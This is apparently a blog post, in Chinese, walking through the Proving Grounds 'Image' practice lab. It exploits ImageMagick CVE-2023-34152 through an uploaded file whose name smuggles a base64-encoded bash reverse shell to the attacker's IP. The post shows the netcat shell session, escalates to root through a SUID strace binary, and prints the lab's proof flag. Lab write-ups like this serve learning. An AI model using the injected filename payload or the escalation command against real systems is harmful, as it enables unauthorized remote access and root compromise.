临渊羡鱼

退而结网

0%

Proving Grounds Practice - Image

Posted on Edited on In , ,
Proving Grounds Practice Lab中Image打靶过程记录

Difficult

Meduim

scan

autorecon

sudo autorecon 192.168.212.178

1
2
3
4
5
6
7
[*] ssh found on tcp/22.
    OpenSSH 8.2p1


[*] http found on tcp/80.
    Apache/2.4.41
    ImageMagick Identifier

80 ImageMagic

随便上传一个文件, 成功后显示版本号 6.9.6-4

foothold

google搜索 imagemagick 6.9.6 exploit

https://github.com/ImageMagick/ImageMagick/issues/6339

issue中提到 CVE-2023-34152 再次搜索找到github: https://github.com/overgrowncarrot1/ImageTragick_CVE-2023-34152,克隆代码执行, 生成两个图片文件

1
2
3
└─$ ls
 base.txt           '|en"`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjIzNC84MCAwPiYxCg=='$'\n'' | base64 -d | bash`".png'   README.md
 CVE-2023-34152.py   en.png

上传 '|en....png' , 成功获得shell, cat /etc/passwd发现只有root一个账户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
rlwrap nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.178] 46508
bash: cannot set terminal process group (1169): Inappropriate ioctl for device
bash: no job control in this shell
www-data@image:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
fwupd-refresh:x:113:117:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin

escalation

下载linpeas并执行, 发现strace suid权限, gtfobins查找利用方式 /usr/bin/strace -o /dev/null /bin/sh -p提权成功

https://gtfobins.github.io/gtfobins/strace/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@image:/var/www/html$ /usr/bin/strace -o /dev/null /bin/sh -p
/usr/bin/strace -o /dev/null /bin/sh -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
cd /root
ls
ImageMagick-7.1.0-16
email2.txt
proof.txt
snap
cat proof.txt
056bd9764a79f6e07150768696acf296
whoami
root